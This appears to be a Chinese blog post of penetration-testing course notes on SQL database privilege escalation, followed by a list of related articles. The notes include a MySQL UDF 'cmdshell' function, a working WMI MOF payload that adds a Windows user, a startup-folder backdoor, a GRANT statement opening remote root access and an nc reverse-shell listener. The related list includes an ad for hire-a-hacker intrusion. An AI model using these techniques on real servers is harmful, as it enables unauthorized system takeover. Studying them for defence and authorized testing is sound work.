7.22-27MY&MS&ORA等SQL資料庫提權

路Sang發表於2024-07-27

SQL資料庫

思路：在利用系統溢位漏洞無果情況下，可以採用資料庫提權；

前提：資料庫服務開啟，且獲得資料庫最高許可權賬號密碼；除Access資料庫外，其他資料庫基本都存在提權可能；

Mysql提權

思路： 服務探針-資訊收集-提權利用-獲取許可權；

1、讀取預設資料庫配置檔案；(瞭解其命名和查詢規則)
sql data inc config conn database common include

2、讀取資料庫儲存和備份檔案（瞭解資料庫儲存格式及對應內容）

@@basedir/data/資料庫名.表名.myd

思路：找到mysq'l安裝路徑下的，data資料夾中的user.MYD檔案；

密碼儲存在mysql.user目錄；

直接解密root密碼，為root

3、利用指令碼暴力破解（是否支援外聯及如何開啟外聯）

預設root不直接外聯；
思路： 將爆破指令碼傳輸上網站伺服器；

4、遠端本地暴力破解，伺服器本地暴力破解；

UDF提權（原理mysql呼叫系統命令函式）

首先：UDF（Userdefined function）是使用者自定義函式；

1.mysql<5.1，匯出目錄c:/windows/system32

2.mysql=>5.1，匯出資料庫安裝目錄/lib/plugin；存在於’mysql/lib/plugin’目錄下，檔案字尾為’.dll’

思路： 判斷資料庫版本，執行sql語句select version();，之後檢視資料庫安裝目錄，執行select @@basedir;

手工建立plugin目錄或利用NTFS流建立；
select 'x' into dumpfile '目錄/lib/plugin::INDEX_ALLOCATION'

建立udf引數命令create function cmdshell returns string soname 'moonnudf.dll'

MOF提權（基於mysql特性）

原理： 利用mof是windows系統一個檔案（在 f），託管物件格式；

1、將mof上傳至任意可讀可寫目錄下；

利用程式碼如下

1 #pragma namespace("\\\\.\\root\\subscription") 
2 instance of __EventFilter as $EventFilter 
3 { 
4 EventNamespace = "Root\\Cimv2"; 
5 Name = "filtP2"; 
6 Query = "Select * From __InstanceModificationEvent " 
7 "Where TargetInstance Isa \"Win32_LocalTime\" " 
8 "And TargetInstance.Second = 5"; 
9 QueryLanguage = "WQL"; 
10 }; 
11 instance of ActiveScriptEventConsumer as $Consumer 
12 { 
13 Name = "consPCSV2"; 
14 ScriptingEngine = "JScript"; 
15 ScriptText = 
16 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")";  # 執行命令需修改
17 }; 
18 instance of __FilterToConsumerBinding 
19 { 
20 Consumer = $Consumer; 
21 Filter = $EventFilter; 
22 };

2.用sql語句將檔案匯入；

slelct load_file ('上傳目錄')into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';

3、等待命令執行成功；

寫入啟動項（配合作業系統自啟動）

win10啟動項：C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

匯出自定義可執行檔案到啟動目錄配置重啟執行；
將建立好的後門或執行檔案進行伺服器啟動項寫入，配合重啟執行；

啟動專案錄：C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup寫入後門；
此時若要利用msf進行攻擊寫入後門提權則必須先開啟資料庫外聯；

GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' WITH GRANT OPTION; 其中username和password為賬密

反彈shell（基於反彈特性命令）

思路：將資料庫許可權反彈至伺服器中，監聽伺服器埠即可；
nc -l -p 5577

MSSQL提權，轉至

[[2023.7.2-3-4Mssql xp_cmdshell提權]]

上述筆記包含 1.xp_cmdshell提權和 2.sp_oacreate提權

3、沙盒提權

三、Oracle提權

jsp網站後門不需要提權，自帶system

提權工具對應三種模式

1、普通使用者

2、DBA使用者

3、注入模式

滲透之——資料庫提權
2019-01-04
資料庫
SQL Sever提權
2021-06-22
SQL
MySQL資料庫Root許可權MOF方法提權研究
2018-07-06
MySql資料庫
Sa提權Sql語句大全
2018-05-13
SQL
提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權
2017-03-29
Windows伺服器SQL
SQL Server資料庫SA許可權總結
2009-04-09
SQLServer資料庫
異構資料庫遷移 sql等價改寫
2022-06-14
資料庫SQL
MS SQL資料庫SA許可權入侵的感悟
2009-02-24
SQL資料庫
SQL語句select隨機調取10行資料 Access/SQL Server/Mysql等資料庫
2015-04-15
隨機ServerMySql資料庫
SQL資料庫
2020-11-07
SQL資料庫
Linux提權————利用SUID提權
2018-05-23
LinuxUI
Windows提權實戰——————3、PcAnyWhere提權
2018-05-20
WindowsPCA
對國產資料庫廠商提幾個關於SQL引擎的小需求
2022-07-13
資料庫SQL
【人在】尋高手滲透/網站入侵提權,資料庫提取資料Q！10125.08669
2018-06-06
網站資料庫
windows提權--組策略首選項提權
2024-07-31
Windows
WordPress SQL隱碼攻擊漏洞與提權分析
2015-08-25
SQL
SQL:清空資料庫所有資料
2009-10-12
SQL資料庫
[提權禁區]1433埠入侵提權
2016-03-27
Linux提權-70種sudo提權彙總
2024-08-29
Linux
Linux利用UDF庫實現Mysql提權
2021-09-09
LinuxMySql
SQL Server 2008固定資料庫角色的許可權
2008-11-25
SQLServer資料庫
MySQL等資料庫和大資料誰快？
2021-12-16
MySql資料庫大資料
內網滲透之——mssql資料庫提權之——xp_cmdshell執行系統命令
2020-03-12
內網SQL資料庫
[提權禁區] SQL語句利用xp_cmdshell獲取許可權
2016-03-27
SQL
給國產資料庫廠商提個建議：把慢SQL監控升級為關鍵SQL管理
2022-11-17
資料庫SQL
MySQL資料庫許可權體系入門(5)---管理資料庫許可權
2010-10-25
MySql資料庫
[提問交流]OT的資料庫引擎可以換成InnoDB資料庫引擎嗎？
2019-05-11
資料庫
Linux 提權
2018-11-29
Linux
mysql UDF提權
2022-01-31
MySql
利用for命令提權
2012-05-02
windows提權 (一)
2024-07-26
Windows
Linux提權
2024-08-07
Linux
Sql Server 資料庫學習-常用資料庫物件
2021-09-09
SQLServer資料庫物件
SQL Server資料庫安全
2021-04-22
SQLServer資料庫
資料庫-SQL 語法
2021-07-29
資料庫SQL
資料庫優化SQL
2018-11-03
資料庫優化SQL
【資料庫】SQL語句
2018-05-30
資料庫SQL
資料庫效能常用SQL
2014-01-09
資料庫SQL

7.22-27MY&MS&ORA等SQL資料庫提權

Mysql提權

UDF提權（原理mysql呼叫系統命令函式）

MOF提權（基於mysql特性）

寫入啟動項（配合作業系統自啟動）

反彈shell（基於反彈特性命令）

MSSQL提權，轉至

3、沙盒提權

三、Oracle提權

相關文章